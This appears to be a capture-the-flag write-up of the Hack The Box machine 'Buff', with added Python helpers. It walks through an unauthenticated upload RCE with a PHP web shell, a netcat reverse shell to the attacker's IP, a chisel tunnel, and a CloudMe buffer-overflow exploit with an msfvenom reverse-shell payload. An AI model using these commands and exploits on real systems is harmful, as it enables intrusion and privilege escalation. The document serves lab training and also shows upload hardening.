🕵 HTB-Writeup : BUFF

Recon

rustscan

Rustscan is a port scanner written in Rust. It does not replace nmap but complements it well: it scans all 65535 TCP ports very quickly and then hands only the open ports to nmap.

This speeds up port discovery and lets the slower nmap scan (with scripts) run only against ports that are actually open.

└─$ rustscan -t 2000 -b 20000 -a 10.10.10.198 -- -A -Pn -timing 5

.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
Open 10.10.10.198:7680
Open 10.10.10.198:8080

PORT     STATE SERVICE    REASON  VERSION
7680/tcp open  pando-pub? syn-ack
8080/tcp open  http       syn-ack Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

dirbuster

Running dirbuster against the site turns up a lot of files and directories.


Searching vulnerabilities

Trying SQLi

I first tried SQL injection on the login form of the main page, on the email= and password= parameters.

└─$ sqlmap -u "http://10.10.10.198:8080/home.php" --dump --batch --forms 

It failed: sqlmap found no injectable parameter.

Then, I tried on the feedback.php page.

└─$ sqlmap -u "http://10.10.10.198:8080/feedback.php?feed=coucou" --dump --batch --forms

Again, the feed parameter does not appear to be injectable.

I tried several other pages without finding any SQL injection, so this is probably not the entry point.

Gym Management Software

The contact.php page reveals that the website is built with Gym Management Software v1.0.


Searching for this software with searchsploit turns up four entries (listed there as Gym Management System).

└─$ searchsploit gym mana
------------------------------------------------------------------ -------------------------
 Exploit Title                                                    |  Path
------------------------------------------------------------------ -------------------------
Gym Management System 1.0 - 'id' SQL Injection                    | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass                 | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting           | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code Execution | php/webapps/48506.py
------------------------------------------------------------------ -------------------------

I first tried the Unauthenticated Remote Code Execution exploit.

It abuses the fact that upload.php never checks whether the user is authenticated, so anyone can upload files. The extension whitelist and the file-type check are bypassed by giving the PHP file a double extension and prefixing its content with the magic bytes of an image.
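To make the bypass concrete, here is an added Python model (written for this writeup, not the application's source, which is not shown on this page) of the vulnerable upload logic next to a hardened version. The way the stored name keeps the inner .php, the function names and the constructed test file (a PNG header followed by a one-line PHP web shell) are all assumptions of the model.

```python
import secrets

ALLOWED_EXT = {"jpg", "jpeg", "gif", "png"}

# Leading magic bytes -> image type. Prefixing a PHP file with one of these
# is exactly what defeats a "file type" check that only looks at the header.
MAGIC = {
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
}


def sniff_image_ext(content: bytes):
    """Extension implied by the leading magic bytes, or None if none matches."""
    for magic, ext in MAGIC.items():
        if content.startswith(magic):
            return ext
    return None


def weak_upload(filename: str, content: bytes, authenticated: bool):
    """Model of the vulnerable pattern (assumed shape, not the app's code):
    - `authenticated` is never looked at (no login required),
    - the whitelist checks only the LAST extension,
    - the type check looks only at the first bytes,
    - the stored name is built from the client's filename, so 'shell.php.png'
      is written as 'upload/shell.php' inside a web-served directory.
    Returns the stored path, or None when the upload is rejected."""
    parts = filename.split(".")
    if parts[-1].lower() not in ALLOWED_EXT:
        return None                      # whitelist applied to the last extension only
    if sniff_image_ext(content) is None:
        return None                      # "file type" check on magic bytes only
    return f"upload/{parts[0]}.{parts[1]}"


def hardened_upload(filename: str, content: bytes, authenticated: bool,
                    max_size: int = 2_000_000):
    """Hardened counterpart. The client's filename is never used: the basename
    is random and the extension comes from the sniffed content. The caller must
    be logged in. Serve upload/ with PHP execution disabled as well (for Apache,
    php_admin_flag engine off in that directory), so a polyglot that is both a
    valid image and PHP stays inert even if it gets through."""
    if not authenticated:
        return None
    if len(content) > max_size:
        return None
    ext = sniff_image_ext(content)
    if ext is None:
        return None
    return f"upload/{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed sample: PNG header followed by a tiny PHP web shell.
    webshell = b"\x89PNG\r\n\x1a\n<?php system($_GET['cmd']); ?>"
    print("weak     :", weak_upload("shell.php.png", webshell, authenticated=False))
    print("hardened :", hardened_upload("shell.php.png", webshell, authenticated=False))
    print("hardened (logged in):", hardened_upload("shell.php.png", webshell, authenticated=True))
```

The lesson the hardened version encodes is that neither the extension nor the magic bytes are trustworthy input: the server picks the name, derives the extension itself, and the upload directory is not allowed to execute code at all.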

└─$ python2 /usr/share/exploitdb/exploits/php/webapps/48506.py http://10.10.10.198:8080/
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
buff\shaun

It works! We can grab the user flag.

C:\xampp\htdocs\gym\upload> type C:\Users\shaun\Desktop\user.txt
***********************891c747da

Get clean shell

But the shell this exploit gives is not great: we cannot change directory and we do not see error output. So I set up a clean, persistent and interactive shell.

To do so, I share netcat from my machine over SMB, copy it onto the target, and use it to spawn a PowerShell reverse shell.

# Host 
impacket-smbserver -smb2support share . -username pezzz -password pezzz
rlwrap nc -lvnp 443

# Target
net use \\10.10.16.6\share /u:pezzz pezzz
copy \\10.10.16.6\share\nc.exe
.\nc.exe -e powershell 10.10.16.6 443

We now have a clean shell.

Path to the privesc

Local recon

I first checked the privileges held by our user; none of them is exploitable.

Then I listed the network connections with netstat, filtering on TCP.

# show used ports
netstat -ano | findstr TCP

  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       4056
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       6532

# map each listening PID to its process name and owner
tasklist /v | findstr 4056
tasklist /v | findstr 6532

mysqld.exe   4056  BUFF\shaun
CloudMe.exe  6532  N/A

Two services are listening on the loopback address only. One is the MySQL server (mysqld.exe), presumably the one bundled with XAMPP.

The other is CloudMe.exe, a file-storage service. Note that tasklist reports its user as N/A, which typically means our low-privileged shell is not allowed to query that process: a hint that it runs under a different, more privileged account.
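As an added example (mine, not part of the writeup), the same triage done in Python: parse the output of netstat -ano and tasklist /v, keep only listeners bound to 127.0.0.1, and join them to their owning process. Both samples are constructed in the shape of the box's output (the ports, PIDs and image names for MySQL and CloudMe come from the writeup; the httpd.exe line, the memory figures and the session columns are made up) so that the script runs offline.

```python
import re

# Constructed sample in the shape of `netstat -ano | findstr TCP` on the box.
NETSTAT_SAMPLE = """\
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       2216
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       4056
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       6532
  TCP    10.10.10.198:8080      10.10.16.6:51234       ESTABLISHED     2216
"""

# Constructed sample in the shape of `tasklist /v` (English Windows 10 output):
# Image Name, PID, Session Name, Session#, Mem Usage, Status, User Name, CPU Time, Window Title.
TASKLIST_SAMPLE = """\
httpd.exe                     2216 Services                   0     18,432 K Unknown         NT AUTHORITY\\SYSTEM      0:00:01 N/A
mysqld.exe                    4056 Services                   0     25,600 K Unknown         BUFF\\shaun              0:00:05 N/A
CloudMe.exe                   6532 Console                    1     37,888 K Running         N/A                      0:00:12 CloudMe
"""

NETSTAT_RE = re.compile(
    r"^\s*TCP\s+(?P<ip>[\d.]+):(?P<port>\d+)\s+\S+\s+(?P<state>\S+)\s+(?P<pid>\d+)\s*$")

# Status is one of Unknown / Running / Not Responding; the user column is
# "N/A", "NT AUTHORITY\..." (contains a space) or DOMAIN\user.
TASKLIST_RE = re.compile(
    r"^(?P<image>\S+)\s+(?P<pid>\d+)\s+\S+\s+\d+\s+[\d,]+ K\s+"
    r"(?:Unknown|Running|Not Responding)\s+"
    r"(?P<user>N/A|NT AUTHORITY\\\S+|\S+\\\S+)")


def parse_netstat(text: str):
    """One dict per TCP line: local ip, local port, state, owning pid."""
    rows = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if m:
            rows.append({"ip": m["ip"], "port": int(m["port"]),
                         "state": m["state"], "pid": int(m["pid"])})
    return rows


def parse_tasklist(text: str):
    """pid -> (image name, user name). User 'N/A' means the owner could not be read."""
    procs = {}
    for line in text.splitlines():
        m = TASKLIST_RE.match(line)
        if m:
            procs[int(m["pid"])] = (m["image"], m["user"])
    return procs


def loopback_listeners(netstat_text: str, tasklist_text: str):
    """Listening sockets bound to 127.0.0.1 only, joined to their process.
    These are unreachable from the network and therefore candidates for tunneling."""
    procs = parse_tasklist(tasklist_text)
    found = []
    for r in parse_netstat(netstat_text):
        if r["state"] == "LISTENING" and r["ip"].startswith("127."):
            image, user = procs.get(r["pid"], ("?", "?"))
            found.append((r["port"], r["pid"], image, user))
    return sorted(found)


if __name__ == "__main__":
    for port, pid, image, user in loopback_listeners(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print(f"127.0.0.1:{port:<6} pid={pid:<6} {image:<14} user={user}")
```

On a real box, pipe the two commands' output into these parsers; the 0.0.0.0:8080 line in the sample is there to show that externally reachable listeners are filtered out, since those were already covered by the port scan.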

Search for any vulnerabilities

With searchsploit we find several exploits for CloudMe.

└─$ searchsploit cloudme                
-------------------------------------------------- ---------------------------------
 Exploit Title                                    |  Path
-------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC)            | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)   | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)   | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)  | windows_x86-64/remote/45197.rb
-------------------------------------------------- ---------------------------------

The usable ones are Python scripts, but the target has no Python interpreter, so they cannot run on the box. And since CloudMe only listens on 127.0.0.1:8888, they cannot reach it from my machine either. For the moment I have no way to run the exploit.

Tunneling

From here on, victim refers to the box and attacker to my machine.

After some research I settled on a tunnel. A tunnel forwards traffic between the attacker and the victim, which lets me run the exploit locally (on my machine) while its traffic is delivered to the service on the box.

For this I used Chisel, "a fast TCP/UDP tunnel, transported over HTTP, secured via SSH".

[Figure: scheme describing creation of a SOCKS proxy using chisel]

First, start a chisel server on the attacker, listening on port 8000; --reverse allows clients to request reverse port forwards.

# Attacker
└─$ ./chisel server -p 8000 --reverse

On the victim, upload the chisel binary and run it in client mode. A remote follows the pattern <local-host>:<local-port>:<remote-host>:<remote-port>; the R: prefix makes it a reverse forward, so the listener is opened on the server (attacker) side.

# Victim
.\chisel.exe client 10.10.16.6:8000 R:8888:localhost:8888

Explaining the arguments:

  • 10.10.16.6:8000 : attacker IP and chisel server port
  • R:8888:localhost:8888 :
    • R : reverse forward, the listener is opened on the remote end (the attacker)
    • 8888 : listen on port 8888 of the attacker
    • localhost : traffic is forwarded to localhost… (as seen from the victim)
    • 8888 : … on port 8888 of the victim

This creates the tunnel: everything sent to port 8888 on the attacker (my machine) is forwarded to port 8888 on the victim, which is where CloudMe listens.


On the attacker, the chisel server logs the new tunnel, and netstat confirms the listener.

└─$ netstat -ntlp                       
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp6       0      0 :::8000                 :::*                    LISTEN      19663/./chisel_1.7. 
tcp6       0      0 :::8888                 :::*                    LISTEN      19663/./chisel_1.7. 

The tunnel is up: we listen on port 8888 and every connection to it is forwarded to the victim.

Creating the exploit

With the tunnel in place we can run the Python exploit locally, against 127.0.0.1:8888, and its traffic is redirected to the box.

We start from the exploit found on exploit-db (the PoC's payload bytes are omitted here).

# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

# Through the chisel tunnel, 127.0.0.1:8888 on the attacker reaches CloudMe on the victim
target = "127.0.0.1"

padding1   = b"\x90" * 1052                 # bytes before the saved return address
EIP        = b"\xB5\x42\xA8\x68"            # 0x68A842B5 -> PUSH ESP, RET (little-endian)
NOPS       = b"\x90" * 30                   # sled that ESP points into after the RET

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
# payload here: paste the msfvenom output, which defines a bytes variable named payload
payload = b""

overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))   # fill up to 1500 bytes

buf = padding1 + EIP + NOPS + payload + overrun

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, 8888))
    s.send(buf)
except Exception as e:
    print(e)    # the original's sys.exc_value only exists in Python 2

The exploit is a stack buffer overflow in the CloudMe service: 1052 bytes of padding reach the saved return address, which is overwritten with the address of a PUSH ESP; RET gadget, so execution continues in the NOP sled and then in the shellcode placed right after it. The shellcode runs with the privileges of the CloudMe process, which here are the administrator's. The PoC's own payload only launches calc.exe.

We generate our own payload with msfvenom using the same options as the PoC, but with a reverse-shell payload.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.6 LPORT=4444 -b '\x00\x0A\x0D' -f python -v payload

The -v payload switch names the output variable payload, so the generated block can be pasted directly into the script in place of the original one.
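Before sending anything it is worth checking that the pasted payload still fits the PoC's layout. The following Python helper is an added example for this writeup (not part of the exploit-db script): it rebuilds the buffer with the PoC's constants, rejects a payload that contains one of the bad characters or exceeds the space left, and reports where each region lands. The 351 INT3 bytes used as a stand-in payload are constructed; the real msfvenom output goes in their place.

```python
import struct

# Constants taken from the PoC
EIP_OFFSET = 1052                 # padding bytes before the saved return address
RET_ADDR   = 0x68A842B5           # PUSH ESP ; RET gadget used by the PoC
NOP_SLED   = b"\x90" * 30
TOTAL_LEN  = 1500                 # size of the buffer the PoC sends
BAD_CHARS  = frozenset({0x00, 0x0A, 0x0D})   # the -b '\x00\x0A\x0D' set given to msfvenom


def find_bad_chars(payload: bytes, bad=BAD_CHARS):
    """(offset, value) of every byte the target would truncate or mangle on."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def max_payload_len(total_len: int = TOTAL_LEN) -> int:
    """Room left for shellcode once padding, EIP and the NOP sled are accounted for."""
    return total_len - EIP_OFFSET - 4 - len(NOP_SLED)      # 414 with the PoC's numbers


def build_buffer(payload: bytes, total_len: int = TOTAL_LEN) -> bytes:
    """Assemble padding | EIP | NOP sled | payload | filler exactly as the PoC does,
    refusing to build a buffer that cannot work."""
    bad = find_bad_chars(payload)
    if bad:
        raise ValueError(f"payload contains bad chars at offsets {[i for i, _ in bad][:5]}")
    if len(payload) > max_payload_len(total_len):
        raise ValueError(f"payload is {len(payload)} bytes, max is {max_payload_len(total_len)}")
    # After the overwritten return address is popped, ESP points at the bytes that
    # follow it, i.e. the NOP sled; PUSH ESP ; RET therefore lands in the sled.
    eip = struct.pack("<I", RET_ADDR)        # little-endian: b"\xB5\x42\xA8\x68"
    head = b"\x90" * EIP_OFFSET + eip + NOP_SLED + payload
    return head + b"C" * (total_len - len(head))


def describe_layout(buf: bytes) -> dict:
    """Offsets of each region, to eyeball before sending."""
    return {
        "length": len(buf),
        "eip": buf[EIP_OFFSET:EIP_OFFSET + 4],
        "sled_start": EIP_OFFSET + 4,
        "payload_start": EIP_OFFSET + 4 + len(NOP_SLED),
    }


if __name__ == "__main__":
    # Constructed stand-in for the msfvenom output: 351 INT3 bytes, not real shellcode.
    stand_in = b"\xcc" * 351
    print("max payload:", max_payload_len())
    print(describe_layout(build_buffer(stand_in)))
```

With the PoC's numbers the shellcode may be at most 1500 - 1052 - 4 - 30 = 414 bytes; an x86 windows/shell_reverse_tcp encoded to avoid those three bytes is typically around 350 bytes, so it fits, but a different payload or a larger bad-char set can push it over, and this check catches that before the service is crashed for nothing.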

We start a netcat listener on the port set in the payload and run the exploit.

└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.198] 49820
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

whoami
buff\administrator

We get an administrator shell! We can now read the root flag :)

Tags

Easy, External, Apache, Python, Penetration Tester Level 2, Buffer Overflow, A04:2021-Insecure Design, Reversing, PHP, Remote Code Execution, A06:2021-Vulnerable And Outdated Components